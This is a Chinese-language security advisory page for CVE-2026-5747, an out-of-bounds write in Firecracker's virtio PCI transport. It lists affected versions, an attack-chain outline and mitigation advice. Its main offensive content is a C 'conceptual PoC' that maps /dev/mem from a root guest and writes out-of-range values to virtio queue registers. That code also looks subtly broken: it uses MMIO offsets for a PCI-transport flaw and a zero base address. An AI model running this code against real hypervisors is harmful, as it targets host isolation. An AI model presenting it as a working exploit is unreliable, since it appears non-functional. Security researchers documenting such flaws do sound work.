CVE-2026-5747 CVSS 7.5 高危

CVE-2026-5747 Firecracker越界写入漏洞

披露日期: 2026-04-08

来源: ff89ba41-3aa1-4d27-914a-91399e9639e5

漏洞信息

漏洞编号

CVE-2026-5747

漏洞类型

越界写入

CVSS评分

7.5 高危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Firecracker

漏洞概述

Firecracker是一款轻量级虚拟机监视器（VMM）。该漏洞存在于virtio PCI传输层中，由于越界写入问题，本地具有root权限的guest用户可能在设备激活后修改virtio队列配置寄存器。成功利用此漏洞可能导致VMM进程崩溃，或在特定条件下（如使用自定义guest内核）在Host主机上执行任意代码，严重影响虚拟化环境的安全性。

技术细节

该漏洞源于Firecracker在处理virtio PCI传输时的边界检查缺失。具体的触发点是在设备被激活之后，攻击者利用guest系统的root权限，对virtio队列配置寄存器进行恶意修改。由于代码未能正确验证写入数据的范围，导致了越界写入（Out-of-bounds Write）的发生。

在x86_64和aarch64架构下，此漏洞允许攻击者破坏VMM进程的内存布局。虽然直接的利用目标是导致拒绝服务（VMM崩溃），但在满足特定前置条件（例如使用了自定义的guest内核或特定的快照恢复配置）时，攻击者可能进一步控制执行流，从而在宿主机上实现任意代码执行。这打破了虚拟化的隔离边界，威胁宿主机的安全。

攻击链分析

STEP 1

获取Guest权限

攻击者需要在Firecracker运行的Guest虚拟机中获得root权限。

STEP 2

定位配置寄存器

识别并访问virtio PCI传输层中的队列配置寄存器内存映射区域。

STEP 3

触发越界写入

在设备激活后，利用root权限恶意修改virtio队列配置寄存器，绕过边界检查。

STEP 4

执行攻击

导致VMM进程崩溃（DoS），或在满足特定条件下（自定义内核）在Host主机上执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-5747
 * This code attempts to trigger the out-of-bounds write
 * by modifying virtio queue configuration registers.
 * Requires root privileges within the guest VM.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>

#define VIRTIO_MMIO_QUEUE_SEL 0x030
#define VIRTIO_MMIO_QUEUE_NOTIFY 0x050

// Function to map device memory (simplified)
void* map_device_memory(off_t base_addr) {
    int mem_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (mem_fd < 0) {
        perror("Failed to open /dev/mem (requires root)");
        return NULL;
    }
    void* mapped = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, base_addr);
    close(mem_fd);
    return mapped;
}

int main() {
    printf("[+] Attempting to trigger CVE-2026-5747...\n");
    
    // Assuming the base address of the virtio device (hypervisor specific)
    off_t device_base = 0x00000000; 
    volatile unsigned int* virtio_regs = (unsigned int*)map_device_memory(device_base);
    
    if (!virtio_regs) {
        return -1;
    }

    // Trigger condition: Modify queue configuration after activation
    // This specific sequence attempts to corrupt memory via out-of-bounds write
    printf("[+] Modifying virtio queue registers...\n");
    
    // Writing out of bounds values to queue selection/notify
    virtio_regs[VIRTIO_MMIO_QUEUE_SEL/4] = 0xFFFF; // Invalid queue index
    virtio_regs[VIRTIO_MMIO_QUEUE_NOTIFY/4] = 0xFFFFFFFF; 

    printf("[+] Exploit triggered. Check Host VMM status.\n");
    
    return 0;
}

影响范围

Firecracker 1.13.0 - 1.14.3

Firecracker 1.15.0

防御指南

临时缓解措施

在无法立即升级的情况下，应严格限制Guest系统的用户权限，避免提供root访问权限。此外，避免使用不可信的自定义Guest内核或特定的快照配置，以增加攻击者利用该漏洞的难度。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表